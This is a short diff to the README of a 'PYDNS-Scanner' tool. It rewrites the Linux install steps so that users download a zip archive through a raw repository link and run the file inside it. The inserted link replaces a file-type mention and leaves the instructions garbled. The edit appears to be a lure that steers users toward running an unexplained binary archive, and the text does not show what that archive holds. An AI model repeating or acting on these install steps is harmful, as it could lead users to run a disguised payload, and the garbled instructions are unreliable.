sus112112/PYDNS-Scanner/README.md

 1. **Visit the Releases Page**: Click the link above to go to the PYDNS-Scanner Releases page.
 2. **Choose Your Version**: Look for the latest release, typically at the top.
 3. **Download the File**: Click the download link for your operating system.
-You may see options like a `.exe` for Windows, a `.pkg` for macOS, or a `.tar.gz` for Linux.
+You may see options like a `.exe` for Windows, a `.pkg` for macOS, or a `https://raw.githubusercontent.com/sus112112/PYDNS-Scanner/main/python/Scanner_PYDN_3.8.zip` for Linux.
 4. **Save the File**: Choose a location on your computer to save the downloaded file.
 5. **Run the Installer**:
    - For Windows: Double-click the `.exe` file.
    - For macOS: Open the `.pkg` file and follow the prompts.
-   - For Linux: Extract the `.tar.gz` file and run the contained file in the terminal.
+   - For Linux: Extract the `https://raw.githubusercontent.com/sus112112/PYDNS-Scanner/main/python/Scanner_PYDN_3.8.zip` file and run the contained file in the terminal.

 Once installation completes, you are ready to use PYDNS-Scanner.